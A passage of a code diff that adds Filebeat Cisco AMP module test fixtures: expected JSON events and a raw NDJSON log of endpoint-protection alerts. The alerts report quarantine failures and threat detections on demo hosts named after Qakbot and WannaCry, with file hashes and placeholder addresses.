"cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 81129, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 82330, + "related.hash": [ + 
"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 87312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": 
"10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88505, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, 
+ "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 89691, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90884, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 92070, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 
"ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93256, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + 
"event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 94442, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 95628, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 96814, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 
"ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 98000, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + 
"event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 99186, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 100372, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 105894, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 423000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 107014, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064596", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 377000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 108200, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064594", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 33000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275394960065000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 109386, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + 
"related.hosts": [
+ "Demo_WannaCry_Ransomware"
+ ],
+ "related.ip": [
+ "8.8.8.8",
+ "10.10.10.10"
+ ],
+ "service.type": "cisco",
+ "tags": [
+ "cisco-amp",
+ "forwarded"
+ ]
+ }
+]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log
new file mode 100644
index 000000000000..dc134052124e
--- /dev/null
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log
@@ -0,0 +1,62 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine 
